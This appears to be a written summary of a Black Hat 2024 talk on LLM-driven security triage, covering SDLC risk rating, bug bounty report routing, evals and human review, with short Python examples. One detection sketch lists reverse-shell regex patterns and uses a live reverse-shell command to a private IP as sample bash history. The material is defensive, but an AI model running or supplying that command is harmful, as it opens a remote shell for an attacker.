Black Hat 2024

LLMs at the Core: From Attention to Action in Scaling Security Teams

Black Hat · 1,061 views · 43:02 · over 1 year ago

This talk demonstrates the integration of Large Language Models (LLMs) into security operations to automate SDLC risk assessment, incident response, and bug bounty report triage. The speakers showcase how LLMs can be used to analyze Slack conversations, design documents, and security logs to provide actionable insights and reduce human workload. The presentation highlights the importance of using high-quality data, prompt engineering, and human-in-the-loop verification to mitigate LLM hallucinations and errors. The authors also release three open-source tools designed to implement these automated security workflows.

Automating Security Triage: Scaling Your Workflow with LLMs

TLDR: Security teams are drowning in noise from bug bounty programs and internal alerts, leading to burnout and missed critical vulnerabilities. This talk introduces three open-source bots that leverage LLMs to automate SDLC risk assessment, triage incoming bug reports, and handle incident response. By integrating these tools into Slack and using high-quality prompt engineering, teams can filter out the noise and focus human effort on genuine threats.

Security operations centers and internal security teams are currently facing a massive scaling problem. Between the sheer volume of automated scanner output and the flood of reports from public bug bounty programs, the signal-to-noise ratio has plummeted. When a team receives 900 reports in a single week, the human cost of manual triage becomes unsustainable. Most of these reports are either out of scope, duplicates, or simple misconfigurations that don't warrant a high-priority investigation. This is where the industry is shifting toward using LLMs not as a replacement for human judgment, but as a force multiplier for the triage process.

Moving Beyond Simple Automation

Traditional security tools rely on static rules and regex-based filtering, which are notoriously brittle. If a developer changes a document format or a bug bounty hunter uses a slightly different phrasing, the automated pipeline breaks. The research presented at Black Hat 2024 demonstrates a more flexible approach: using LLMs to interpret context. By feeding raw data from Slack threads, design documents, and security logs into a model, you can perform semantic analysis that understands the intent behind a message or a configuration change.

The core of this approach is the SDLC bot, which acts as an automated gatekeeper for new projects. Instead of forcing developers to fill out complex security questionnaires, the bot monitors design documents and Slack discussions. It extracts the necessary context to assign a risk rating and a confidence score. If the bot identifies a high-risk change, such as a shift from internal-only access to public exposure, it flags the project for a manual security review. This keeps the security team involved only when it matters, rather than acting as a bottleneck for every minor feature update.
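That gating logic can be sketched in a few lines. Here `llm_complete` is a stand-in for whatever model API you use, and the JSON schema, the 0.7 threshold, and the stubbed reply are assumptions for illustration, not the released bot's actual interface:

```python
import json

# Role-primed prompt, per the talk's advice to define the model's role.
RISK_PROMPT = """You are an expert cybersecurity engineer.
Given the design-document excerpt below, reply with JSON containing:
  "risk": one of "low", "medium", "high"
  "confidence": a number between 0 and 1
  "reason": one sentence explaining the rating

Excerpt:
{excerpt}
"""

def assess_change(excerpt: str, llm_complete) -> dict:
    """Ask the model for a risk rating and parse its JSON reply."""
    return json.loads(llm_complete(RISK_PROMPT.format(excerpt=excerpt)))

def needs_manual_review(assessment: dict, threshold: float = 0.7) -> bool:
    """Escalate only confident high-risk calls; everything else
    stays in the automated lane."""
    return assessment["risk"] == "high" and assessment["confidence"] >= threshold

# Stub standing in for a real model call, for illustration only.
def fake_llm(prompt: str) -> str:
    return ('{"risk": "high", "confidence": 0.9, '
            '"reason": "service moves from internal-only to public exposure"}')

assessment = assess_change("Expose the billing API to the public internet", fake_llm)
print(needs_manual_review(assessment))  # True
```

In production the stub would be replaced by a real completion call, and a low-confidence answer could be routed to a human rather than trusted in either direction.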

The Mechanics of LLM-Driven Triage

One of the most effective use cases for this technology is triaging bug bounty reports. The volume of reports can be overwhelming, and many are submitted by researchers who lack the full context of your internal architecture. The Incident Response Bot helps by automatically categorizing incoming reports into buckets like "Model Safety," "Customer Support," or "Security Report."
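A minimal sketch of that bucketing step follows. The bucket names come from the talk; the "Needs Human Triage" fallback and the keyword-based stub classifier are assumptions added for illustration, standing in for an LLM classification call:

```python
# Known triage buckets from the talk.
BUCKETS = {"Model Safety", "Customer Support", "Security Report"}

def route_report(report_text: str, classify_report) -> str:
    """Bucket a report, falling back to human triage when the model
    answers outside the known categories."""
    bucket = classify_report(report_text)
    return bucket if bucket in BUCKETS else "Needs Human Triage"

def stub_classifier(text: str) -> str:
    # Stand-in for an LLM call, keyed on an obvious keyword.
    return "Security Report" if "vulnerability" in text.lower() else "Customer Support"

print(route_report("Found a vulnerability in the login flow", stub_classifier))
# Security Report
```

Keeping the fallback explicit matters: a model that invents a new category should trigger human review, not silently drop the report.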

For a pentester or researcher, the value here is in the feedback loop. If a report is missing a full URL or clear reproduction steps, the bot can automatically prompt the researcher for the missing information. This reduces the back-and-forth time for the triager. The model is essentially acting as a first-pass analyst, ensuring that by the time a human looks at a report, it is complete and actionable.
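The obvious completeness checks don't even need a model. A pattern-based first pass, a deliberate simplification of what the bot likely does, can draft the follow-up before anything else runs; the field names and regexes here are assumptions:

```python
import re

# Hypothetical required elements; a real bot's checklist would differ.
REQUIRED = {
    "full URL": re.compile(r"https?://\S+"),
    "reproduction steps": re.compile(r"(?i)steps to reproduce|repro steps"),
}

def missing_fields(report: str) -> list:
    """List the required elements the report lacks."""
    return [name for name, pat in REQUIRED.items() if not pat.search(report)]

def follow_up_message(report: str):
    """Draft an automatic reply asking for anything missing,
    or return None when the report is already complete."""
    gaps = missing_fields(report)
    if not gaps:
        return None
    return ("Thanks for the report! Before we can triage it, "
            "please add: " + ", ".join(gaps))
```

A model can then handle the fuzzier judgment, such as whether the listed steps actually reproduce the claimed issue.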

To implement this effectively, you must move away from "vibe-based" prompting. The speakers emphasized that you need to treat the model like an expert. When you prompt the model, explicitly define its role: "You are an expert cybersecurity engineer." This simple instruction significantly improves the quality of the output. Furthermore, you should use evals to measure performance. If you are not testing your prompts against a known dataset of good and bad reports, you are flying blind.
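A bare-bones eval loop is enough to start. The labeled data and stub classifier below are invented for illustration; the `classifier` argument can be any callable, including a prompted model:

```python
def run_evals(classifier, labeled_reports) -> float:
    """Accuracy of `classifier` over (report_text, expected_bucket) pairs."""
    correct = sum(1 for text, expected in labeled_reports
                  if classifier(text) == expected)
    return correct / len(labeled_reports)

# Invented labeled dataset, for illustration only.
LABELED = [
    ("SQL injection on /search endpoint", "Security Report"),
    ("How do I reset my password?", "Customer Support"),
    ("The model produced harmful output", "Model Safety"),
]

def stub_classifier(text: str) -> str:
    # Stand-in for a prompted LLM call.
    lowered = text.lower()
    if "injection" in lowered or "xss" in lowered:
        return "Security Report"
    if "model" in lowered:
        return "Model Safety"
    return "Customer Support"

print(run_evals(stub_classifier, LABELED))  # 1.0
```

Run the same dataset after every prompt change, and the accuracy number becomes the regression test for your triage pipeline.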

Real-World Applicability and Risks

During the live demo, the speakers showed how the bot could detect a malicious reverse shell command hidden within a user's bash history. The model identified the command, flagged it as a security incident, and initiated a chat with the user to confirm their intent. This is a powerful example of how LLMs can handle the "boring" parts of log analysis, allowing SOC analysts to focus on complex, multi-stage attacks.
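Pattern matching alone can surface candidates like that for the model to confirm. A sketch of such a pre-filter follows; the pattern list is illustrative and deliberately not exhaustive, and a hit is a lead rather than a verdict:

```python
import re

# Illustrative reverse-shell idioms; a match is handed to the model
# (or an analyst) to confirm intent in context.
REVERSE_SHELL_PATTERNS = [
    re.compile(r"bash -i >& /dev/tcp/"),
    re.compile(r"\bnc\b.*\s-e\s"),
    re.compile(r"python\S* -c .*socket.*connect"),
]

def suspicious_history_lines(bash_history: str) -> list:
    """Return history lines matching known reverse-shell shapes."""
    return [line for line in bash_history.splitlines()
            if any(p.search(line) for p in REVERSE_SHELL_PATTERNS)]

history = "\n".join([
    "ls -la",
    "bash -i >& /dev/tcp/10.0.0.5/4444 0>&1",
    "git status",
])
print(suspicious_history_lines(history))
# ['bash -i >& /dev/tcp/10.0.0.5/4444 0>&1']
```

Feeding only the flagged lines to the model, with surrounding context, keeps token costs down while preserving the confirm-with-the-user step from the demo.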

However, these tools are not infallible. The biggest risk is over-reliance on the model's output. You must maintain a human-in-the-loop for any decision that involves access control or incident escalation. If the model incorrectly classifies a critical Broken Access Control issue as "out of scope," you have a major problem. The goal is to use the model to filter the 90% of noise, not to automate the final decision on the 10% of critical findings.

Building Your Own Pipeline

If you want to start experimenting with these techniques, you don't need to build a custom model from scratch. The tools released by the team are designed to work with off-the-shelf models. Start by identifying the most repetitive, low-value tasks in your current workflow. If you spend hours every week closing "not applicable" reports or manually checking if a new service is exposed to the internet, that is your starting point.

Focus on high-quality data. If your internal documentation is outdated or your Slack channels are filled with irrelevant chatter, the model will struggle. Clean up your input data before you try to automate the analysis. When you do start, use the evaluation framework to track your progress. If you see the model's accuracy dip after a change to your prompt, you will know exactly when and why it happened. Security automation is not a set-and-forget process; it is an iterative cycle of testing, refining, and monitoring. Start small, keep the human in the loop, and let the model handle the heavy lifting of the initial triage.
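Tracking accuracy per prompt version makes that dip visible at the exact change that caused it. A minimal sketch, with invented version labels and a hypothetical 2% tolerance:

```python
def first_regression(history, tolerance: float = 0.02):
    """Given (prompt_version, eval_accuracy) pairs in chronological
    order, return the first version whose accuracy dropped more than
    `tolerance` below the previous run, or None if none did."""
    for (_, prev), (version, curr) in zip(history, history[1:]):
        if prev - curr > tolerance:
            return version
    return None

# Each entry would come from a run of your eval suite.
runs = [("v1", 0.91), ("v2", 0.92), ("v3", 0.84)]
print(first_regression(runs))  # v3
```

Storing these pairs alongside the prompt text itself gives you a simple audit trail: when accuracy regresses, you can diff the offending version against its predecessor.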
